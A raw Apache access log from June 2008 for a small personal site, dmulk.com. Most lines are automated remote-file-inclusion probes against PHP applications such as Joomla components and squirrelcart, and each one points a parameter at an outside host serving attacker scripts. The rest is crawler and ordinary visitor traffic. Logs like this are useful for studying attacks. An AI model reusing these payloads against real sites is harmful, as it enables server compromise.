212.227.127.185 - - [25/Jun/2008:12:49:16 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.25.157.253 - - [25/Jun/2008:12:49:48 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.25.157.253 - - [25/Jun/2008:12:49:49 -0700] "GET /errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.25.157.253 - - [25/Jun/2008:12:49:51 -0700] "GET /logs/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:50:04 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:50:06 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:50:12 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:50:13 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:12:50:18 -0700] "GET /logs/access_080213.log/components/com_performs/performs.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:12:50:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:12:50:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.51.249 - - [25/Jun/2008:12:50:39 -0700] "GET /blog/index.php/2008/06/09/ HTTP/1.0" 200 6622 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:50:49 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:50:49 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:50:49 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:50:56 -0700] "GET /logs/access_080212.log/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:51:11 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:51:39 -0700] "GET /logs//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:51:40 -0700] "GET //include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:51:41 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:51:41 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:51:41 -0700] "GET /logs/access_080105.log/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:51:41 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:12:52:04 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:12:52:07 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 200 18497 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:12:52:08 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:52:22 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:52:24 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:52:24 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:52:28 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:52:28 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:52:32 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:52:32 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:52:40 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.23 - - [25/Jun/2008:12:52:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:52:57 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:53:01 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:12:53:07 -0700] "GET /logs/access.log/index.php?pag=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.23 - - [25/Jun/2008:12:53:09 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/?show=gallery&nggpage=2 HTTP/1.1" 200 27694 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.98.70.18 - - [25/Jun/2008:12:53:10 -0700] "GET /index.php?pag=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:12:53:11 -0700] "GET /logs/index.php?pag=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:53:36 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:53:50 -0700] "GET /logs/access_080212.log/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:53:54 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:53:54 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:12:53:58 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:54:08 -0700] "GET /logs/access_080105.log/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:54:10 -0700] "GET /logs/access_071005.log HTTP/1.0" 200 49825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:54:27 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:48 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:48 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:56 -0700] "GET / HTTP/1.1" 200 18257 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:56 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:56 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:57 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:58 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:58 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:58 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:59 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:59 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:59 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:59 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:54:59 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:55:01 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&374 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:55:02 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 1376256 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:55:02 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&265 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
196.25.157.253 - - [25/Jun/2008:12:55:08 -0700] "GET /logs/access_080212.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [25/Jun/2008:12:55:19 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:55:21 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:55:24 -0700] "GET /logs/access_080423.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:55:53 -0700] "GET /logs/access_080108.log//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:55:53 -0700] "GET //include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:55:54 -0700] "GET /logs//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:55:57 -0700] "GET /logs/access_071229.log//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:56:04 -0700] "GET /logs/access_080215.log/joomla/index.php?option=com_restaurante&task=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:12:56:41 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.118.32.155 - - [25/Jun/2008:12:56:44 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0149.jpg HTTP/1.1" 200 293632 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
89.108.67.192 - - [25/Jun/2008:12:56:46 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:12:56:50 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 200 18497 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.110.101 - - [25/Jun/2008:12:56:50 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/?show=gallery&nggpage=2 HTTP/1.0" 200 0 "http://search.live.com/results.aspx?q=great&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
210.87.251.41 - - [25/Jun/2008:12:57:08 -0700] "GET /logs/access.log//errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:12:57:09 -0700] "GET //errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.41 - - [25/Jun/2008:12:57:09 -0700] "GET /logs//errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:57:15 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:57:28 -0700] "GET /logs/access_080225.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.176 - - [25/Jun/2008:12:57:30 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.176 - - [25/Jun/2008:12:57:31 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.176 - - [25/Jun/2008:12:57:31 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:57:34 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:57:37 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:58:02 -0700] "GET /logs/access_080225.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:58:08 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:58:38 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:58:39 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:58:40 -0700] "GET /logs//include/write.php?dir=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:58:41 -0700] "GET //include/write.php?dir=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:12:58:47 -0700] "GET /logs/order/login.php?svr_rootscript=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:12:58:47 -0700] "GET /order/login.php?svr_rootscript=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:58:55 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:58:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:58:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:12:59:03 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.41 - - [25/Jun/2008:12:59:03 -0700] "GET /logs/access_080312.log//errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:12:59:04 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:59:09 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:59:16 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:59:17 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:59:36 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:59:37 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:59:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:59:42 -0700] "GET /logs/access_080127.log/scanhttp://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:59:43 -0700] "GET /scanhttp://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:59:43 -0700] "GET /logs/scanhttp://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com" 69.54.43.84 - - [25